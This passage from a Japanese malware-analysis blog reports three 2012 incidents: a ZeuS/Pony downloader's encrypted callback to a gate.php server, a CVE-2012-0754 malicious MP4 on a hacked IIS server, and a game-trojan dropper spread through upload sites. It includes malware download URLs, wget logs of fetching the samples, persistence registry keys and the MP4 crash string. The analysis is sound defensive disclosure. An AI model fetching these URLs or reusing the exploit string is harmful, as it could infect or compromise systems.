00000180 | CA9F 909F C33C B144 F365 075E BE47 3CFE | .....<.D.e.^.G<.
00000190 | AFAE F418 023D 3738 A0E2 E6AB BA0C 882A | .....=78.......*
000001A0 | 4C6A 67EB 1F86 BEC2 EEB6 36B0 9B0E FCBF | Ljg.......6.....
000001B0 | 97A5 4AB3 EB22 6606 116D 2FF0 1B43 3318 | ..J.."f..m/..C3.
000001C0 | 048D 3F70 A7E4 4DBA 254F                | ..?p..M.%O

ポート8008↓
00000000 | 504F 5354 202F 706F 6E79 2F67 6174 652E | POST /pony/gate.
00000010 | 7068 7020 4854 5450 2F31 2E30 0D0A 486F | php hxxp/1.0..Ho
00000020 | 7374 3A20 7375 6264 6174 6170 726F 2E63 | st: subdatapro.c
00000030 | 6F6D 0D0A 4163 6365 7074 3A20 2A2F 2A0D | om..Accept: */*.
00000040 | 0A41 6363 6570 742D 456E 636F 6469 6E67 | .Accept-Encoding
00000050 | 3A20 6964 656E 7469 7479 2C20 2A3B 713D | : identity, *;q=
00000060 | 300D 0A43 6F6E 7465 6E74 2D4C 656E 6774 | 0..Content-Lengt
00000070 | 683A 2031 3931 0D0A 436F 6E6E 6563 7469 | h: 191..Connecti
00000080 | 6F6E 3A20 636C 6F73 650D 0A43 6F6E 7465 | on: close..Conte
00000090 | 6E74 2D54 7970 653A 2061 7070 6C69 6361 | nt-Type: applica
000000A0 | 7469 6F6E 2F6F 6374 6574 2D73 7472 6561 | tion/octet-strea
000000B0 | 6D0D 0A43 6F6E 7465 6E74 2D45 6E63 6F64 | m..Content-Encod
000000C0 | 696E 673A 2062 696E 6172 790D 0A55 7365 | ing: binary..Use
000000D0 | 722D 4167 656E 743A 204D 6F7A 696C 6C61 | r-Agent: Mozilla
000000E0 | 2F34 2E30 2028 636F 6D70 6174 6962 6C65 | /4.0 (compatible
000000F0 | 3B20 4D53 4945 2035 2E30 3B20 5769 6E64 | ; MSIE 5.0; Wind
00000100 | 6F77 7320 3938 290D 0A0D 0A43 5259 5054 | ows 98)....CRYPT
00000110 | 4544 3094 8E01 19A5 3F45 D2ED 2B1D AB7F | ED0.....?E..+...
00000120 | 58CA 51C0 C0AA 4DFF E41F A0D5 69D6 86B8 | X.Q...M.....i...
00000130 | 1866 7898 C311 9146 8568 375A 430F D4DC | .fx....F.h7ZC...
00000140 | ED14 32F0 2E42 E8DC 2ADA B141 10C5 A541 | ..2..B..*..A...A
00000150 | 60B8 B2C6 5B79 E3F5 A6BD CACA 9559 E8EA | `...[y.......Y..
00000160 | 5CD1 0A23 8263 DC3C 48A7 D320 5C75 1482 | \..#.c.<H.. \u..
00000170 | 5A44 CC20 5F4D 407A 7A27 E589 9BF6 37BE | ZD. _M@zz'....7.
00000180 | CA9F 909F C33C B144 F365 075E BE47 3CFE | .....<.D.e.^.G<.
00000190 | AFAE F418 023D 3738 A0E2 E6AB BA0C 882A | .....=78.......*
000001A0 | 4C6A 67EB 1F86 BEC2 EEB6 36B0 9B0E FCBF | Ljg.......6.....
000001B0 | 97A5 4AB3 EB22 6606 116D 2FF0 1B43 3318 | ..J.."f..m/..C3.
000001C0 | 048D 3F70 A7E4 4DBA 254F                | ..?p..M.%O

・最後に下記のダウンロード動きを発見しました↓
  TCP/8080 HTTP/GET/1.1
  hxxp://109.202.98.43/q.php?f=ba33e 

本件のマルウェア情報はZeuSトロイダウンローダです。
本マルウェアは上記のように色んなバックドア動きを準備して、そしてZBOTマルウェアを
ダウンロードする。さらに、パソコンの情報を暗号化された状況で送信されてしまいます。

ウイルススキャン結果は↓

File name:         q.php@f=ba33e
MD5:               c3e5699e9a715b28b54b7850b6610e7a
File size:         93.0 KB ( 95272 bytes )
File type:         Win32 EXE
Detection ratio:   6 / 42
Analysis date:     2012-04-03 14:29:56 UTC 
Result:            [CLICK] 
4.4. 最新版Zeus/Zbotトロイ、「q.php?f=14095」

上記のマルウェアURLを実行したら↓

--23:29:48--  hxxp://109.202.98.43/q.php?f=ba33e
           => `q.php@f=ba33e'
Connecting to 109.202.98.43:80... connected.
hxxp request sent, awaiting response... 200 OK
Length: 95,272 (93K) [application/x-msdownload]
100%[====================================>] 95,272       104.39K/s
23:29:50 (104.22 KB/s) - `q.php@f=ba33e' saved [95272/95272]
ウイルススキャン↓

File name:        q.php@f=ba33e
MD5:              c3e5699e9a715b28b54b7850b6610e7a
File size:        93.0 KB ( 95272 bytes )
File type:        Win32 EXE
Detection ratio:  6 / 42
Analysis date: 	  2012-04-03 14:29:56 UTC
Detection Result: [CLICK]
マルウェアの動きは↓

下記のファイルを保存(DROP)↓

1. 本サンプルファイル 
2. %AppData%\Edfiy\wiwi.exe     A9DEC788F6026F028F195FF08B4940C1 296,488 bytes
3. %AppData%\epevf.enm          02447C2ABAFEB7A94B5493068F34B14D 1,322 bytes
4. %Temp%\tmp8f60e9b0.bat       02447C2ABAFEB7A94B5493068F34B14D 168 bytes 
※epevf.enmはZeuS設定ファイルでtmp8f60e9b0.batに色んなPCの情報が履歴されます。
下記のプロセスが立ち上がります↓

wiwi.exe      %AppData%\Edfiy\wiwi.exe   229,376 bytes
                   shell="C:\Documents and Settings\Administrator\
                           Application Data\Edfiy\wiwi.exe"
cmd.exe       %System%\cmd.exe           262,144 bytes
Explorer.exe  %Windows%Explorer.exe    1,033,728 bytes
※ダイレクトリーとファイル名はランダムでそれぞれの感染が違います。
実行順番はこんな感じ↓

サンプル
  |
  +---wiwi.exe
        |
        +---cmd.exe
               |
               +---Explorer.exe 
レジストリーに自動起動登録を発見↓

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
{3DFA1AE4-115C-AD7B-A6BA-A75086AF8442} = "%AppData%\Edfiy\wiwi.exe" 
さらに、暗号の鍵を発見↓

[HKEY_CURRENT_USER\Software\Microsoft\Efyfxe]
781f8ac = "a5WVFk+y1V0="
3g515be = "V5X4Fg=="
28j878i6 = "ht34FmTB5l2wlMyp" 
ShellFolderの登録が%AppData%のフォルダーへ設定された↓

HKU\​S-1-5-21-842925246-1425521274-308236825-500\​Software\​Microsoft\​Vufio
 32a612e6  03PYNrQa688=
HKU\​S-1-5-21-842925246-1425521274-308236825-500\​Software\​Microsoft\​Windows\
 ​CurrentVersion\​Explorer\​Shell Folders  AppData  C:\​Documents and Settings\​Administrator
 \​Application Data
HKU\​S-1-5-21-842925246-1425521274-308236825-500\​Software\​Microsoft\​Windows\​CurrentVersion
 \​Explorer\​Shell Folders  Local AppData  C:\​Documents and Settings\​Administrator
 \​Local Settings\​Application Data 
パソコンのブラウザのZoneとCookieが変更されて(マルウェアの準備)

HKU\..\Internet Explorer\​Privacy  info     CleanCookies      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​0  info     1609      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​1  info     1406      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​1  info     1609      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​2  info     1609      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​3  info     1406      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​3  info     1609      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​4  info     1406      0
HKU\..\Windows\​CurrentVersion\​Internet Settings\​Zones\​4  info     1609      0
いくつかMUTEXが出ました↓(explorer)

Global\{370A7811-​AFFA-​2A8F-​E811-​5333C5ED7021}
Global\{370A7816-​AFFD-​2A8F-​E811-​5333C5ED7021}
Global\{3BE6AF24-​78CF-​2663-​E811-​5333C5ED7021}
Global\{EDE09917-​4EFC-​F065-​E811-​5333C5ED7021} 
それでキーロガーの証拠↓

VK_LBUTTON (1)      18  
■感染されたドメイン情報と手続き連絡先に付いて

インターネットルーティング図とASN情報↓


ドメイン責任者の情報↓

[Domain Name]                   BOO.JP
[Registrant]                    paperboy&co.
[Name Server]                   sv.madame.jp
[Name Server]                   dns2.lolipop.jp
[Created on]                    2004/05/12
[Expires on]                    2012/05/31
[Status]                        Active
[Last Updated]                  2011/06/01 01:05:01 (JST)
Contact Information:
[Name]                          paperboy&co.
[Email]                         admin@muumuu-domain.com
[Web Page]                      http://muumuu-domain.com/?mode=whois-policy
[Postal code]                   810-0001
[Postal Address]                Tenjin Prime 8F, 2-7-21, Tenjin
                                Chuo-ku, Fukuoka-City, Fukuoka
                                8100001,Japan
[Phone]                         092-713-7999
[Fax]                           092-713-7944
----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 5:38 午前 1 comments

月曜日, 4月 02, 2012

#OCJP-034: ハッキングされた36.2.249.196(GMO/IDC)のIISサーバにCVE-2012-0754脆弱性MP4のダウンロードURLを発見!


今回の事件は「CVE-2012-0754」脆弱性の関係ですが、「CVE-2012-0754」のEXPOITファイルが日本のネットワークに発見しました。恐らくウェブサーバ(ETag: "01a8f5d24bcd1:0" Server: Microsoft-IIS/7.5)がハッキングされて本件のファイルが入れてしまいました。日付けを確認したらハッキングが行ったのは恐らく3月26日~4月1日の間かと思われます。
さて、詳細情報は下記となります↓
■ドメイン/サーバの情報↓

36.2.249.196
  Last-Modified: Mon, 26 Mar 2012 07:45:08 GMT
  Accept-Ranges: bytes
  ETag: "01a8f5d24bcd1:0"
  Server: Microsoft-IIS/7.5
  X-Powered-By: ASP.NET
■感染されたURL↓

hxxp://36.2.249.196/siryou.mp4

--20:09:42--  hxxp://36.2.249.196/siryou.mp4
           => `siryou.mp4'
Connecting to 36.2.249.196:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,384 (22K) [application/octet-stream]
100%[====================================>] 22,384        --.--K/s
20:09:43 (259.23 KB/s) - `siryou.mp4' saved [22384/22384] 
■ファイルの説明↓

-rwx------   1 22,384 Mar 25 22:45 siryou.mp4
スナップショット↓

■ウイルススキャン結果↓

File name:       siryou.mp4
File type:       MP4
MD5:             98732f6066bfd2ea976ecdca8975af17
File size:       21.9 KB ( 22384 bytes )
Detection ratio: 21 / 41
Analysis date:   2012-04-02 11:15:53 UTC 
Result:          [C L I C K ! ]
■マルウェア説明↓

CVEの情報基づきAdobe Flash Playerのバグがあり、あるMP4ファイルをFlash Playerで実行すると
リモートでPCの権限を取られ、システムコマンドの実行が可能になる。
英語では↓
By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary 
remote code execution under the context of the user. 
本件のファイルは正しくそのMP4です。

現在、本件の攻撃がインターネットで流行っています。
一番多いなのはWindows OfficeのファイルにFlashオブジェクトが入れられてそのFlashが
本件みたいなMP4ダウンロードURLが書いてある事です。他のパターンもあり、直接SWFファイルに
本件みたいなMP4ダウンロードURLが書いてある事。
セキュリティの世界には本件の攻撃仕組みは「Iran’s Oil and Nuclear Situation.doc」の攻撃といいます。

本サンプルの中身みると↓

テキストエディターからこんな感じです↓
$ cat siryou.mp4

cprtf   mp42♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀
♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀
♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀
♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀
♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀
♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀qtggfsfifbsigtskjfhbsefhshbf
yiegfkwjlefhbeygfwfgkbslfbsifbelsfbeklsfbyilfgbgbfhwkefgbifqhbfuoqfhbuogehuofhqu
fhquequfguhfjfheqhufhufhuqfhfefhaukhbshduyfhajhdfiygeyhlfaegfahaeiufhalhefeuiafh
alofehelafh♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀
♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀
♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀♀qtggfsfifb
sigtskjfhbsefhshbfyiegfkwjlefhbeygfwfgkbslfbsifbelsfbeklsfbyilfgbgbfhwkefgbifqhb
fuoqfhbuogehuofhqufhquequfguhfjfheqhufhufhuqfhfefhaukhbshduyfhajhdfiygeyhlfaegfa
haeiufhalhefeuiafhalofehelafh♀♀♀♀♀♀
  :
  :
  など
秀丸で見れば↓


下記はバイナリエディターからです↓




↑これを見たらファイルヘッタはMP4ですが、その後にならんでいる「0C」ニットの次に悪戯
STRINGが書いてあります↓

qtggfsfifbsigtskjfhbsefhshbfyiegfkwjlefhbeygfwfgkbslfbsifbelsfbeklsfbyilfgbgbfhw
kefgbifqhbfuoqfhbuogehuofhqufhquequfguhfjfheqhufhufhuqfhfefhaukhbshduyfhajhdfiyg
eyhlfaegfahaeiufhalhefeuiafh
↑これで影響されたはーションのFlash playerに流すとcrash出てPCの権限が取られます。

もっと分かりやすい様に、ERIC ROMANGさんが本件のPoCビデオを作ったので、
YouTubeで本MP4のEXPLOITデモ動画の確認が出来ます↓
 
■本件の脆弱性のリファレンス↓

■感染されたネットワーク情報↓

a. [IPネットワークアドレス]     36.2.249.0/24
b. [ネットワーク名]             IDC2-NETWORK
f. [組織名]                     GMOインターネット株式会社
g. [Organization]               GMO Internet,Inc.
m. [管理者連絡窓口]             JP00014973
n. [技術連絡担当者]             JP00014973
p. [ネームサーバ]               ns1.vectant.ne.jp
p. [ネームサーバ]               ns2.vectant.ne.jp
[割当年月日]                    2011/09/28
[返却年月日]                    
[最終更新]                      2011/09/28 11:44:04(JST)
                                
[グループハンドル]              JP00014973
[グループ名]                    GMOインターネット ネットワークチーム
[Group Name]                    GMO Internet Network Team
[電子メール]                    network-team@gmo.jp
[組織名]                        GMOインターネット株式会社
[Organization]                  GMO Internet,Inc.
[部署]                          システム本部
[Division]                      System Dev
[電話番号]                      03-5456-2555
[最終更新]                      2011/06/06 14:08:05(JST)
                                network-team@gmo.jp
----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 8:38 午後 1 comments

日曜日, 4月 01, 2012

#OCJP-033:中国からテイルズウィーバー用(オンラインゲーム)トロイのURLが”ばら撒かれた”


ファイルアップローダーサービス便利なサービスだと思います。今回の発見が「わざっと」でファイルアップローダーのサーバにマルウェアをアップロードされて、それでそのダウンロードURLを色んな掲示板で配っているの事件です。証拠を纏めてこのブログ内容に報告をさせて頂きます、詳細な内容は下記となります↓
■感染されたサーバ情報↓

upload.saloon.jp / 219.94.129.14
■マルウェアのダウンロードURL↓

http://upload.saloon.jp/src/up4754.lzh
http://upload.saloon.jp/src/up4753.zip
■どんなマルウェアでしょうか?

マルウェア種類: トロイ・ドロッパー・キーロガー
マルウェア名 : Win32/Trojan/Agent/Dropper/Downloader
マルウェア機能: ドロッパー(Spyware)機能、ダウンローダー機能
説明     : 1. 感染されたパソコンの情報をログされる(Spyware)、
                 2. 他のマルウェアをPCに保存する(ドロッパー)
■ご注意!

上記の感染されたURLがインターネットでばら撒かれたそうです。
グーグルで検索したら↓

upload.saloon.jp/src/up4754.lzh


upload.saloon.jp/src/up4753.zip


内容は下記のスナップショットとなります↓

※日付けは3月19日ですね。

↑因みに本件の感染事件は何回も発見されました、
同じマルウェアサンプル、同じ遣り方で、掲示板の書き方を見ると恐らく同じ人です。
前回発見したのリンク↓
http://unixfreaxjp.blogspot.jp/2012/02/ocjp-008-lodajp-1413214164-url.html
http://unixfreaxjp.blogspot.jp/2011/06/fonojp.html
http://unixfreaxjp.blogspot.jp/2011/06/loadjp34.html
http://unixfreaxjp.blogspot.jp/2011/05/urlurlupalive.html
本件のやり方で国内のアップローダサービス「LODA.JP」、「FONO.JP」、「UPRODA」が
このアタッカーにやられてしまいましたので、今回は「upload.saloon.jp」の番ですね。
■ダウンロードの証拠↓

--15:05:13--  hxxp://upload.saloon.jp/src/up4754.lzh
           => `up4754.lzh'
Resolving upload.saloon.jp... 219.94.129.14
Connecting to upload.saloon.jp|219.94.129.14|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 424,958 (415K) [application/octet-stream]
100%[====================================>] 424,958      819.60K/s
15:05:14 (817.94 KB/s) - `up4754.lzh' saved [424958/424958]

--15:05:25--  http://upload.saloon.jp/src/up4753.zip
           => `up4753.zip'
Resolving upload.saloon.jp... 219.94.129.14
Connecting to upload.saloon.jp|219.94.129.14|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 344,146 (336K) [application/zip]
100%[====================================>] 344,146        1.46M/s
15:05:25 (1.46 MB/s) - `up4753.zip' saved [344146/344146]

※上記は本当のアーカイブファイルですので、
中身はマルウェアファイル「viploda.jpg.scr」が入ってます。
■ファイルの情報↓

-rwx------   1 344,146 Mar 18 16:52 up4753.zip
-rwx------   1 424,958 Mar 18 21:57 up4754.lzh
-rwx------   1 474,646 Apr 13  2011 viploda.jpg.scr

■ウイルススキャン情報↓

File name:       viploda.jpg.scr
File size:       463.5 KB ( 474,646 bytes )
File type:       PE/Win32 EXE
Tags:            upack
Detection ratio: 36 / 42
Analysis date:   2012-04-01 06:07:13 UTC
Scan RESULT:     [CLICK]
■マルウェア調査結果↓

ファイルSTRUCTURE:
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 2007:09:20 14:34:46+02:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 81920
LinkerVersion............: 5.0
EntryPoint...............: 0x1000
InitializedDataSize......: 19456
SubsystemVersion.........: 4.0
ImageVersion.............: 0.0
OSVersion................: 4.0
UninitializedDataSize....: 0
Compilation timetamp.....: 2007-09-20 12:34:46
Target machine...........: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address......: 0x00001000
PE Sections..............:
Name    Address Size     Raw     Entropy  MD5
.text   4096    81920    79872   6.47  8c499086717691066d921075ed5bdb09
.data   86016   28672     2560   4.91  0cb811e47f78b5404a658fb36b591857
.idata  114688   4096     4096   5.12  8bf175092a70a21f11fd06cc4087c7d0
.rsrc   118784  12507    12800   5.51  984d7583beada574d16b4a912bd1c808
※バイナリーで書いた言語コードを見たら間違いなく中国WindowsOSで作った物です!

バイナリーファイルの中にそのままでマルウェア悪戯コマンドを見れます↓

マルウェアの動きは↓

viploda.jpg.scrのコンパイルした時に「uproda1048.exe」との名前をつけたみたいですね。
実行されたら下記の順番でメモリー上でマルウェアプロセスが立ち上がりました↓

viploda.jpg.scr +---> uproda1048.exe
                        |  
                        +--mxd.exe 4c5f8c191a7929f17e1ac573fecedf53 163,942 Bytes
                             |         (Upack v0.24~v0.28alpha SN:185)
                             +--mxd.exe 4c5f8c191a7929f17e1ac573fecedf53 163,942 Bytes
                                 |
                                 +--aa.bat
                                 |
                                 +--explorer.exe
viploda.jpg.scrを実行したら下記のファイルをWindowsフォルダーへ保存されました

C:\WINDOWS\3074243.jpg
C:\WINDOWS\__tmp_rar_sfx_access_check_499468
C:\WINDOWS\mxd.exe 
それでregistryのデータを変更されました、沢山あるけど需要な物だけで下記書きました↓

ブラウザのインターネットの​ZoneMap設定を変更↓
HKU\..\Internet Settings\​ZoneMap\​info IntranetName  1 (有効にしました) 
HKU\..\Internet Settings\​ZoneMap\​info ProxyBypass  1 (有効にしました)
HKU\..\Internet Settings\​ZoneMap\​info UNCAsIntranet  1(有効にしました)

保存されたmxd.exeをshellで自動実行登録設定↓
HKU\..\Software\Microsoft\Windows\ShellNoRoam\MUICache\​ C:\​WINDOWS\​mxd.exe mxd 

アーカイブSFXを実行が出来るように設定変更を発見↓
HKU\..\Software\WinRAR SFX  C%%WINDOWS C:\​WINDOWS
起動された時の動きに付いて↓

viploda.jpg.scrが実行の前にwin.iniのデータを取ります。
それでmdx.exeを実行されます。
mxd.exeが実行されたらコマンドラインで(SHELL)" "C:\WINDOWS\mxd.exe"もまた実行されているようです。
目的は必ずmxd.exeが立ち上がるように実行したかと思われます。
それでviploda.jpg.scr又はuproda1048.exeのプロセスは終了です。
MXD.EXEのオペレーションを監視したら下記の動きが分かりました↓

・自動起動機能をregistryに登録されます↓
 証拠: HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Run info syspler 
         C:\​WINDOWS\​system32\​mxd.exe  
・パソコンのキーボードの履歴をログされる事(キーローガー)
 証拠: VK_SHIFT (16) 
・マルウェアファイルを保存されます↓
   C:\WINDOWS\system32\jHYrbty2.dll
   C:\WINDOWS\system32\system.exe
   C:\aa.bat
・下記のプロセスを実行されます↓
   C:\WINDOWS\explorer.exe "C:\WINDOWS\explorer.exe"
   C:\WINDOWS\system32\cmd.exe <--- "cmd /c c:\aa.bat" 

プロセスのスナップショット↓

MXD.EXEでのウイルススキャン結果↓

File name:       mxd.exe
File size:       160.1 KB ( 163,942 bytes )
File type:       Win32 EXE
MD5:             4c5f8c191a7929f17e1ac573fecedf53
Tags:            upack
Detection ratio: 38 / 42
Scan Result:     [CLICK]

中国のマルウェアにも確認しましたので、本マルウェアは中国でゲームの世界にも結構流行ったそうです
下記は中国でのスキャン結果となります↓(沢山発見したですね)
http://r.virscan.org/d2f1e885dcb3a8a8f2aea6836d1a3373
http://r.virscan.org/e617830d85012ae7270bbfde16575d94
http://r.virscan.org/d2f1e885dcb3a8a8f2aea6836d1a3373

■念のためにネットワークルーティングと連絡先情報



[Domain Name]                   SALOON.JP
[Registrant]                    SAKURA Internet Inc
[Name Server]                   ns1.dns.ne.jp
[Name Server]                   ns2.dns.ne.jp
[Signing Key]                   
[Created on]                    2005/09/27
[Expires on]                    2012/09/30
[Status]                        Active
[Last Updated]                  2011/10/01 01:05:01 (JST)
Contact Information:
[Name]                          SAKURA INTERNET Inc
[Email]                         jprs-staff@sakura.ad.jp
[Web Page]                       
[Postal code]                   541-0054
[Postal Address]                Sakaisujihonmachi Bldg.9F 1-8-14
                                Minami-honmachi, Chuo-ku, Osaka-shi,
                                Osaka 541-0054 Japan
[Phone]                         06-6265-4830
[Fax]                           06-6265-4834
----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 5:45 午後 1 comments
登録: 投稿 (Atom)